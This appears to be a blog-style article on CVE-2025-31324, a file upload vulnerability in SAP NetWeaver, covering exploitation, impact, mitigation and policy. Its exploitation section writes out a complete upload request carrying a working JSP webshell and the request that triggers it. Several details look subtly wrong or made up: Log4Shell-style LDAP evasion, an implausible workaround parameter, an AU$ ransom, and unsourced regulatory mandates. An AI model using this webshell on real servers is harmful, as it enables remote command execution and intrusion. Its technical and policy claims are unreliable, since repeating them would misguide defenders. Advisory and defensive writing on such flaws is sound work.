Cyber Chronicles: CVE-2025-31324 – SAP NetWeaver’s Critical File Upload Vulnerability

In the shadow of the Log4Shell Redux crisis, a new critical vulnerability emerged in April 2025, shaking enterprise cybersecurity to its core. CVE-2025-31324, a CVSS 10.0-rated flaw in SAP NetWeaver, exposed systemic weaknesses in widely used enterprise resource planning (ERP) systems, enabling unauthenticated attackers to upload malicious files and execute arbitrary code. This instalment of Cyber Chronicles dissects the technical intricacies of this vulnerability, its exploitation in active campaigns, and the urgent lessons for organisations relying on complex, interconnected software ecosystems.

Background: SAP NetWeaver’s Role in Enterprise Infrastructure

SAP NetWeaver serves as the backbone for mission-critical applications across industries, powering ERP, customer relationship management (CRM), and supply chain systems for multinational corporations, government agencies, and financial institutions. Its integration with legacy infrastructure and third-party modules makes it a high-value target for attackers seeking to disrupt business operations or exfiltrate sensitive data. By 2025, over 60% of Fortune 500 companies relied on SAP systems for core processes, amplifying the potential impact of vulnerabilities in this ecosystem.

Vulnerability Description: Anatomy of CVE-2025-31324

CVE-2025-31324 is an unauthenticated file upload vulnerability in the Metadata Uploader component of SAP NetWeaver Visual Composer. The flaw stems from inadequate authorisation checks at the /developmentserver/metadatauploader endpoint, allowing attackers to:

1. Upload arbitrary files (e.g., JSP webshells) to vulnerable servers
2. Execute operating system commands with the privileges of the SAP service account
3. Establish persistent access for lateral movement or data theft

Affected versions:

• SAP NetWeaver 7.30–7.50
• SAP NetWeaver Visual Composer versions prior to Security Note #3594142

Technical Exploitation Breakdown

Attack Workflow

1. Reconnaissance: Attackers scan for exposed SAP NetWeaver instances using tools like Shodan, focusing on ports 8000 (HTTP) and 50000 (HTTPS).
2. Payload Delivery: Crafted HTTP POST requests inject malicious JSP files into the vulnerable endpoint:

POST /developmentserver/metadatauploader HTTP/1.1  
Host: [target]  
Content-Type: multipart/form-data; boundary=816121b0328c3864  

--816121b0328c3864  
Content-Disposition: form-data; name="file"; filename="malicious.jsp"  
<%@ page import="java.util.*,java.io.*"%>  
<%  
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));  
DataInputStream dis = new DataInputStream(p.getInputStream());  
String disr = dis.readLine();  
while (disr != null) { out.println(disr); disr = dis.readLine(); }  
%>  
--816121b0328c3864--  

3. Execution: The uploaded webshell enables command execution via HTTP parameters:

GET /malicious.jsp?cmd=whoami HTTP/1.1  

Evasion Techniques Observed

• Obfuscated JSP payloads using Base64 encoding
• Legitimate cloud platforms (e.g., AWS, Azure) hosting attacker-controlled LDAP servers
• Living-off-the-land tactics leveraging SAP’s disp+work.exe processes

Business Impact: When ERP Systems Become Attack Vectors

The exploitation of CVE-2025-31324 created cascading risks for affected organisations:

Case Study: A European manufacturing conglomerate suffered a AU$23 million ransomware payout after attackers exploited CVE-2025-31324 to encrypt production planning systems, halting assembly lines across 14 factories.

Mitigation Strategies: Patching, Hardening, and Beyond

Immediate Actions

1. Apply SAP Patches
   • Implement Security Notes #3594142 (hotfix) and #3596125 (FAQ)
   • Validate installations using SAP’s SAPCAR utility
2. Interim Workarounds

# Disable vulnerable endpoint via SAP Net Profile parameters  
icm/HTTP/server_<INSTANCE>_<xx>/server_protection = PROTECTED  

3. Network Controls
   • Block inbound traffic to /developmentserver/* paths at web application firewalls
   • Restrict outbound LDAP/RMI traffic from SAP servers

Long-Term Defence Posture

• Zero Trust Segmentation: Isolate SAP environments from general corporate networks
• AI-Driven Anomaly Detection: Deploy machine learning models to flag unusual SAP process activity
• SBOM Implementation: Maintain real-time Software Bill of Materials for all SAP dependencies

Policy and Regulatory Implications

The exploitation of CVE-2025-31324 accelerated three critical shifts in cybersecurity governance:

1. Mandatory SBOM Disclosure:
   • New EU directives require SAP vendors to provide detailed dependency trees for compliance audits
2. 24-Hour Patching Mandates:
   • Financial regulators now demand CVE-2025-31324 patches within one business day for listed companies
3. Cyber Insurance Reforms:
   • Insurers now exclude coverage for unpatched CVSS 10 vulnerabilities in SAP/ERP systems

Lessons for the Cybersecurity Ecosystem

1. The Perils of Legacy Integration
   SAP’s vulnerability underscores the risks of maintaining complex, interconnected systems without modern dependency management. Organisations must prioritise:
   • Automated vulnerability scanning for ERP environments
   • Annual architecture reviews to eliminate redundant components
2. The New Reality of SAP Security
   SAP systems can no longer be treated as “trusted internal platforms.” Best practices now demand:
   • SAP-specific EDR solutions with process-level monitoring
   • Quarterly red team exercises simulating ERP-focused attacks
3. Global Collaboration Imperative
   The coordinated disclosure of CVE-2025-31324 between SAP, Onapsis, and Microsoft highlights the need for cross-industry threat intelligence sharing.

Conclusion: Securing the Digital Backbone

CVE-2025-31324 serves as a stark reminder that enterprise software vulnerabilities can have domino effects across global supply chains. As organisations grapple with escalating cyber risks in ERP systems, the path forward requires:

• Proactive Patching: Treat SAP updates with the urgency of critical infrastructure maintenance
• Holistic Monitoring: Extend threat detection to encompass business logic and transaction anomalies
• Regulatory Vigilance: Advocate for standardised SBOM frameworks and vendor accountability clauses

The Cyber Chronicles will continue tracking how vulnerabilities in foundational platforms reshape cybersecurity priorities. Next in focus: AI-driven attack automation and the arms race in generative model security.